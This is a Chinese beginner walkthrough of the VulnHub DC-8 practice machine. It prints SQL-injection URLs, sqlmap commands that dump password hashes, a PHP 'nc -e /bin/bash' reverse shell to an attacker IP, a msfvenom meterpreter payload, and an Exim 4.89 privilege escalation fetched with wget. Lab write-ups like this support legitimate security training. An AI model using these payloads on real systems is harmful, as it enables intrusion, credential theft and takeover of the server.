靶机DC-8(详细渗透,适合新手渗透)
目录
- 靶机DC-8 (详细渗透,适合新手渗透)
- 0x01靶机描述
- 0x02环境搭建
- 1. 下载并导入靶机
- 2. 查看网络适配器
- 3. 启动靶机
- 0x03靶机渗透
- 一、 信息收集
- 1. 主机发现
- 2. 端口扫描
- 3. 详细扫描
- 4. 目录扫描
- 5. gobuster目录扫描
- 6. 网站指纹识别
- 二、 漏洞挖掘
- 手工sql注入
- 1. 通过手工验证,此处url含有sql注入漏洞
- 2. 判断字段数
- 3. 判断显示位置
- 4. 查看当前数据库
- 5. 查找库d7db中所有的表
- 6. 查找uesrs表中所有的列
- 7. 查询表中的数据
- sqlmap自动化执行
- 1. 查当前数据库
- 2. 查表
- 3. 查列
- 4. 查数据
- 4. 使用John进行暴力破解
- 5. 可以将破解出来的密码尝试ssh远程登录
- 6. 在此网页尝试登录,该网页由前面目录扫描得到
- 远程代码执行漏洞
- 1.找到可以编辑php代码的地方
- 2.尝试写phpinfo代码
- 三、 漏洞利用
- 方法一:
- 1. 编写反弹shell脚本
- 2.保存提交前开启kali进行监听
- 3. 点击提交发现网页此时正跳转,而我们的攻击机已经拿到shell
- 方法二:
- 1. 使用msfvenom制作反弹shell脚本
- 2.将php代码复制到网站中
- 3. kali设置msf选项,进行监听
- 4.提交代码(此时后台默认执行所编写的php脚本代码)
- 5. 拿到shell,并用python打开一个标准shell
- 四、 提权
- 1.find 命令查找具有sudo权限的命令,发现exim4在使用时具有root权限`
- 2.查看命令exim4命令版本
- 3.利用serachsploit查找exim命令的漏洞
- 4.进行查看用法,发现有两个使用方法
- 5.将文件复制到/tmp目录,并用python打开一个临时的HTTP服务
- 6.将46996.sh下载到靶机
- 7.然后我们再重新进行上传
- 8.查看flag
- 0x04实验总结
靶机DC-8 (详细渗透,适合新手渗透)
0x01靶机描述
靶机信息
链接 | https://www.vulnhub.com/entry/dc-8,367/ |
---|---|
发布日期 | 2019年9月4日 |
作者 | DCAU |
难度 | 简单 |
0x02环境搭建
1. 下载并导入靶机
打开vmware-文件-打开-DC-8.ova
2. 查看网络适配器
将靶机网络适配器改为NAT模式
3. 启动靶机
点击 ▶靶机,开启成功
0x03靶机渗透
一、 信息收集
1. 主机发现
2. 端口扫描
3. 详细扫描
4. 目录扫描
5. gobuster目录扫描
为了避免漏扫,gobuster再进行目录扫描
6. 网站指纹识别
二、 漏洞挖掘
手工sql注入
1. 通过手工验证,此处url含有sql注入漏洞
http://192.168.30.206/?nid=2 and 1=1 --+
http://192.168.30.206/?nid=2 and 1=2 --+
2. 判断字段数
http://192.168.30.206/?nid=2 order by 1 --+
http://192.168.30.206/?nid=2 order by 2 --+
所以可以看出字段数为1
3. 判断显示位置
http://192.168.30.206/?nid=-2 union select 1 --+
4. 查看当前数据库
5. 查找库d7db中所有的表
http://192.168.30.206/?nid=-2 union select group_concat(table_name) from
information_schema.tables where table_schema=‘d7db’ --+
6. 查找uesrs表中所有的列
http://192.168.30.206/?nid=-2 union select group_concat(column_name) from
information_schema.columns where table_name=‘users’ --+
7. 查询表中的数据
http://192.168.30.206/?nid=-2 union select group_concat(name) from users --+
http://192.168.30.206/?nid=-2 union select group_concat(pass) from users --+
sqlmap自动化执行
1. 查当前数据库
sqlmap -u 'http://192.168.30.206/?nid=2' -current-db
2. 查表
sqlmap -u 'http://192.168.30.206/?nid=2' -D d7db --tables
3. 查列
sqlmap -u 'http://192.168.30.206/?nid=2' -D d7db -T users --columns
4. 查数据
sqlmap -u 'http://192.168.30.206/?nid=2' -D d7db -T users -C login,name,pass --dump
查询到两组数据
admin $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
john $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
4. 使用John进行暴力破解
破解出john的密码trutle
5. 可以将破解出来的密码尝试ssh远程登录
发现ssh远程登录失败,发现需要使用公私钥登录
6. 在此网页尝试登录,该网页由前面目录扫描得到
http://192.168.30.206/user
登录成功
远程代码执行漏洞
1.找到可以编辑php代码的地方
2.尝试写phpinfo代码
发现保存并提交后并没有任何显示。按照网上的说法,php代码保存后会执行代码,这应该是在靶机上已经执行了代码,只是在后台不会显示出来。
三、 漏洞利用
方法一:
1. 编写反弹shell脚本
我们尝试执行PHP反弹shell脚本,将原有的<p>flag</p>进行保留,防止报错
<p>flag</p>
<?php
system("nc -e /bin/bash 192.168.30.182 4567");
?>
2.保存提交前开启kali进行监听
3. 点击提交发现网页此时正跳转,而我们的攻击机已经拿到shell
方法二:
1. 使用msfvenom制作反弹shell脚本
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.30.182 lport=9999R >php_shell.txt
2.将php代码复制到网站中
3. kali设置msf选项,进行监听
4.提交代码(此时后台默认执行所编写的php脚本代码)
5. 拿到shell,并用python打开一个标准shell
python -c 'import pty;pty.spawn("/bin/bash")'
四、 提权
1.find 命令查找具有sudo权限的命令,发现exim4在使用时具有root权限`
find / -perm -u=s -type f 2>/dev/null
2.查看命令exim4命令版本
Exim version 4.89
3.利用serachsploit查找exim命令的漏洞
4.进行查看用法,发现有两个使用方法
5.将文件复制到/tmp目录,并用python打开一个临时的HTTP服务
6.将46996.sh下载到靶机
wget http://192.168.30.182/46996.sh
进行赋权
执行,但是发现两种方法均发生错误
原因:这个报错是由于windows系统下编辑然后上传到linux系统执行导致的
解决方案:本地编辑查看文件类型:set ff=unix
7.然后我们再重新进行上传
使用第二个提权命令进行提权成功
./46996.sh -m netcat
8.查看flag
0x04实验总结
这个靶机考察了目录扫描,sql注入,远程代码执行,反弹shell,提权时使用find查找可以执行的命令,对命令exim的版本提权漏洞等,是一个不错的靶机,适合新手来渗透
靶机DC-8(详细渗透,适合新手渗透)相关推荐
- 靶机渗透SickOs1.2(非常详细,适合新手渗透)
靶机SickOs1.2的目录 0x01靶机描述 0x02环境搭建 0x03靶机渗透 一. 信息收集 二. 漏洞挖掘 PUT方法任意写文件漏洞 1. 查看web主页 2. 查看/test目录支持的方法 ...
- ICP备案教程-图文详细流程适合新手小白(Chinar出品)
如博文无法正常显示,请访问原文地址: https://blog.csdn.net/ChinarCSDN/article/details/82709358 ICP域名备案流程 本文提供全流程,中文翻译. ...
- 2021最新 ICP备案教程-图文详细流程适合新手小白
1 ICP-Internet Content Provider -- 网络内容提供商 ICP -- 可以理解为经过国家主管部门批准的正式企业或部门,向用户提供互联网业务和服务的运营商 比如:阿里云.腾 ...
- c语言写贪吃蛇什么水平_细致的C语言写贪吃蛇教程+详细思路-适合新手附源码...
#史上最详细的C语言贪吃蛇教程 #前言 在有用C写贪吃蛇的一个想法之后,上网查了几个教程,觉得不是很能看懂.恩...或者说不是一下子就能看出来思路+具体怎么实现.所以,我花了早自习的时间想了想如何用最 ...
- (过程超详细)适合新手的ATK-ESP8266+STM32F103系列单片机通过MQTT协议直连阿里云的教程
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一.所用到的硬件设备 二.调试步骤 1.固件的烧录 2.创造阿里云的产品 3.代码修改 4.最终的硬件连接及效果图 总 ...
- 注册Github账号详细教程【超详细篇 适合新手入门】
目录 一.GitHub的简介 1.大概介绍 2.详细介绍 二.如何注册自己的GitHub账户 1.进入github的官网 2.点击右上角注册按钮sign up,来到注册页面 3.在光标处输入自己的邮箱 ...
- redis集群搭建(非常详细,适合新手)
redis集群搭建 在开始redis集群搭建之前,我们先简单回顾一下redis单机版的搭建过程 下载redis压缩包,然后解压压缩文件: 进入到解压缩后的redis文件目录(此时可以看到Makefil ...
- c++贪吃蛇_细致的C语言写贪吃蛇教程+详细思路-适合新手附源码
在有用C写贪吃蛇的一个想法之后,上网查了几个教程,觉得不是很能看懂.恩...或者说不是一下子就能看出来思路+具体怎么实现.所以,我花了早自习的时间想了想如何用最简单的方法实现,晚上大约两个小时写了出来 ...
- (超详细、适合新手)QQ三国实现24小时挂机摆摊卡键喊话
QQ三国原创作者--贴吧ID:杜康技术总监℃ 说明:12到24周岁,没错就是12周岁到24周岁的,现在只要10元一个月就可以24小时挂机,因为阿里有学生套餐,不是的去借一个别人注册好的号购买,或者自己 ...
最新文章
- 撞库:2017年的大麻烦
- MongoDB索引实战技巧
- 如何用计算机组添加打印机共享的打印机,工作组内打印机如何共享?
- 配置所需要的依赖_配置spring所需要的jar包
- 存储如何让文件小一点_如何使用Redis接管文件存储
- cupsd进程_linux pstree命令显示正在运行的进程的进程树状图
- 破旧立新 “云”称霸
- 改变世界的程序员—Jack Dorsey (程序员 2011-6)
- stm32 代码加密
- MATLAB —— 绘制频谱图
- 涨姿势 之 Sourcetree 显示头像
- 安卓或苹果IOS的APP应用如何取名字?好的名字技巧?
- php 利用 PHPExcel 导出 导入 Excel 方法介绍(功能介绍)
- [每日一题] 11gOCP 1z0-052 :2013-09-28 ORA-01555: snapshot too old......................C52
- fastadmin 表头随滚轮滚动 bootstrap-table-fixed-columns 左侧随滚轮滚动
- 论文超详细精读|五千字:STGR
- PspTerminateProcess 结束冰刃进程
- 度数换算_度数的换算
- 【“Unfortunately,app has stoped”问题与解决】
- 测量中的坐标与时间系统1.3(在大地测量学中)